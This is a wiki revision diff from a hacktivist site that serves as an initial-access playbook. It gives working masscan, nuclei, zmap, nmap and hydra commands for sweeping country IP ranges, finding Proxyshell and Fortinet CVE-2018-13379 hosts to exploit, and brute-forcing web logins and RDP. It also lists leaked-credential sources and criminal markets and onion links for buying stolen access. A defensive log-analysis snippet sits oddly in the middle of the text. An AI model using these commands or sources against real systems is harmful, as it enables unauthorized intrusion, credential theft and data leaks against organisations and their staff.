Initial Access Tactics, techniques and procedures: Difference between revisions

From Enlace Hacktivista
Line 1: Line 1:
== Phishing ==
== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link. As hacktivists we want to find away to gain entry inside the targets network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.


==== Tools ====
==== Tools ====
Line 18: Line 18:
* https://github.com/edoverflow/can-i-take-over-xyz
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office


== Password Attacks ==
== Password Attacks ==
Line 24: Line 26:
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.


=== Username creation based on recon/osint ===
=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.
 
* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/digininja/RSMangler
Line 31: Line 36:
* https://github.com/vysecurity/LinkedInt
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/initstring/linkedin2username
* https://bitbucket.org/grimhacker/office365userenum/src/master
* https://github.com/shroudri/username_generator
* https://github.com/shroudri/username_generator
* https://github.com/digininja/CeWL


=== Passwords ===
=== Passwords ===
Common and leaked credentials to test login portals and network services.
==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet
==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/ihebski/DefaultCreds-cheat-sheet
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists


=== Password cracking tools ===
=== Password cracking tools ===
* https://www.kali.org/tools/ncrack
 
* https://www.kali.org/tools/wfuzz
* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/hydra
* https://github.com/1N3/BruteX
A basic example using a wordlist in the format of email:pass/user:pass. <code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
* https://www.kali.org/tools/brutespray


=== Searching leaks ===
=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]
* https://github.com/khast3x/h8mail [Free but includes paid services]


=== Services ===
==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.


* https://haveibeenpwned.com
* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]


Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.
 
=== Buying access ===
'''[https://www.nationalcrimeagency.gov.uk/news/notorious-criminal-marketplace-selling-victim-identities-taken-down-in-international-operation WARNING!] The genesis market has been seized by the authorities. They do operate a v3 Tor onion address however it's unclear whether or not the feds have back-end access to the market so for safety we won't list it here. [https://archive.ph/BcFgs Genesis admin response.]'''
 
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
* https://genesis.market/guest/login/index [Paid]
 
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
 
* https://xss.is
* https://exploit.in [Free & Paid]


=== Password spraying ===
=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.
* https://github.com/dafthack/MSOLSpray
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
Line 79: Line 87:
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper
* https://github.com/dafthack/MailSniper
* <code>hydra -L usernames.txt -p Spring2023 10.10.10.13 rdp</code>


=== Hash cracking ===
=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!
==== Identify hash ====
* https://github.com/blackploit/hash-identifier
==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net
* https://crackstation.net
==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules


== Targeted spray and pray ==
== Buying access ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and grep out targeted domains. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.


==== Tools ====
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* https://www.kali.org/tools/masscan
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]
Scan IP ranges, output only ipv4 addresses and block known honeypots:
 
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 5000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
 
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])
* https://ramp4u.io [Free & Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])
 
== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.
 
=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].


Add the port numbers to the end of discovered IPs in the format: ip-address:443
=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.


<code>sed -i 's/$/:443/' results.txt</code>
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.


[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0


<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2021/CVE-2021-34473.yaml nuclei-templates/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]


Scan for multiple different ports:
'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>


<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 5000 -p4443,4455,10443,8443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>sed -i 's/$/:443/' results.txt</code>


Add unique port numbers to the end of discovered IPs in the format: ip-address:port
*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>


<code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
Exploit Discovered hosts: [[Proxyshell]]


[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]


<code>nuclei -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2018/CVE-2018-13379.yaml nuclei-templates/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
'''Tool''': [https://github.com/zmap/zmap zmap]


* https://github.com/zmap/zmap
'''1.''' Scan for Microsoft Exchange E-mail Servers:
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap and [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]:  
<pre>
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
<pre>
nmap -p 443 -Pn -n \
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>
</pre>
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]
===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.
See [[Domain Spray and Pray]] scanning.
==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.
===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>
===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Latest revision as of 12:22, 30 March 2024

Phishing

Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

Tools

Password Attacks

Groups like Lapsus$ show the world that you don't need to be a great technical hacker to pwn massive corporations, and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar Games, Okta and so on then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.

Usernames

Create a bespoke username word list based on OSINT, recon, permutations and your target's employees' LinkedIn, website and other social media profiles to develop possible usernames and e-mail addresses for your password attacks and password spraying.

Passwords

Common and leaked credentials to test login portals and network services.

Default passwords

Common and leaked passwords

Password cracking tools

Searching leaks

Services

Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!

You can use services that compile COMBO lists (leaked credentials) to search for your target's domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

Once your leaks have been downloaded you can parse your results in the format, e-mail:pass.

Password spraying

Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords (Spring2023) and spray them hoping an employee uses a weak and guessable credential.
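The spraying pattern described above, seen from the defending side: an added example, not from the original page, that classifies sources in constructed authentication log lines as a spray (one source, many distinct accounts, few failures per account) or a brute force (one source, one account hammered), then lists any successful login that came from a flagged source. The log format, hostnames, addresses and thresholds are all constructed assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (syslog-like, not a real product format): one source
# sprays many accounts, a second hammers one account, a third is a normal user.
SAMPLE_LOG = """\
2024-03-30T12:00:01 rdp-gw auth failure user=a.garcia src=203.0.113.7
2024-03-30T12:00:04 rdp-gw auth failure user=b.lopez src=203.0.113.7
2024-03-30T12:00:07 rdp-gw auth failure user=c.perez src=203.0.113.7
2024-03-30T12:00:10 rdp-gw auth failure user=d.ramos src=203.0.113.7
2024-03-30T12:00:13 rdp-gw auth failure user=e.silva src=203.0.113.7
2024-03-30T12:00:16 rdp-gw auth success user=f.torres src=203.0.113.7
2024-03-30T12:01:00 rdp-gw auth failure user=admin src=198.51.100.23
2024-03-30T12:01:01 rdp-gw auth failure user=admin src=198.51.100.23
2024-03-30T12:01:02 rdp-gw auth failure user=admin src=198.51.100.23
2024-03-30T12:01:03 rdp-gw auth failure user=admin src=198.51.100.23
2024-03-30T12:01:04 rdp-gw auth failure user=admin src=198.51.100.23
2024-03-30T12:05:00 rdp-gw auth failure user=g.nunez src=192.0.2.9
2024-03-30T12:05:30 rdp-gw auth success user=g.nunez src=192.0.2.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<svc>\S+) auth (?P<result>success|failure) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def classify_sources(log_text, window=timedelta(minutes=30),
                     min_users=5, min_attempts=5):
    """Label each source IP 'spray', 'bruteforce' or 'normal'.
    spray: failures against >= min_users distinct accounts inside the window
    (per-account lockout never trips); bruteforce: >= min_attempts failures
    against one account. Thresholds are assumed values for this example."""
    failures = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec["result"] == "failure":
            failures[rec["src"]].append((rec["ts"], rec["user"]))

    verdict = {}
    for src, events in failures.items():
        recent = deque()
        label = "normal"
        for ts, user in sorted(events):
            recent.append((ts, user))
            while ts - recent[0][0] > window:  # evict events outside window
                recent.popleft()
            users = [u for _, u in recent]
            if len(set(users)) >= min_users:
                label = "spray"
                break
            if max(users.count(u) for u in set(users)) >= min_attempts:
                label = "bruteforce"
                break
        verdict[src] = label
    return verdict


def successes_from_flagged(log_text, verdict):
    """(user, src) pairs that logged in successfully from a flagged source;
    after a spray these are the weak credentials to reset first."""
    hits = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec["result"] == "success" and verdict.get(rec["src"]) in ("spray", "bruteforce"):
            hits.add((rec["user"], rec["src"]))
    return sorted(hits)
```

Running `classify_sources(SAMPLE_LOG)` on the constructed log flags 203.0.113.7 as a spray and 198.51.100.23 as a brute force, and `successes_from_flagged` returns the f.torres login as the one to review.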

Hash cracking

Crack password hashes using both online and offline tools!

Identify hash

Online tools

Offline tools

Buying access

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.

You can also find access brokers selling network access inside of companies on forums. Services include but are not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

Spray and pray

As shown by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target company's IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited Proxyshell and yoinked all their target e-mails out of their Microsoft Exchange e-mail servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then vulnerability scan the IP addresses you discover.

Prerequisites

There are some prerequisites you will need to follow the below examples:

  1. Virtual or Dedicated server (OPSEC)
  2. Basic command line knowledge
  3. Terminal multiplexers such as Tmux or Gnu/Screen to maintain your scanning and hacking session
  4. Administration skills such as SSH and SCP.

Networks

Vulnerability Scanning

We can use a vulnerability scanning spray and pray technique on publicly facing applications to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on new and old CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

IP Ranges:

Proxyshell

Tool: masscan

1. Scan for Proxyshell:

  • sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
  • sed -i 's/$/:443/' results.txt

Exploit Discovered hosts: Proxyshell

CVE-2018-13379

2. Scan for CVE-2018-13379:

Exploit Discovered hosts: Fortinet SSL VPN Path Traversal

Tool: zmap

1. Scan for Microsoft Exchange E-mail Servers:

sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt

2. Vulnerability scan discovered hosts for Proxyshell using NSE

nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt

Exploit Discovered hosts

Domains

Mass subdomain enumeration, port scanning and vulnerability scanning of domains at the start of an operation, when targeting a country or specific TLDs (.gov), is a great way to get a lot of coverage and find low-hanging-fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See Domain Spray and Pray scanning.

Password Attacks

A lot of organizations use VPNs and RDP to allow employees and third-party contractors to connect remotely into the organization's internal network. Whether they are development or testing systems, lazily administered, or simply forgotten about, these servers can be left running with weak or default credentials and no multi-factor authentication in place. Port scan the internet for the ports they commonly run on, cross-referencing against Shodan for standard and non-standard ports, then try common and default credentials.

RDP

1. Remote Desktop (RDP) Brute forcing:

VPN

2. Virtual Private Network (VPN) Brute forcing: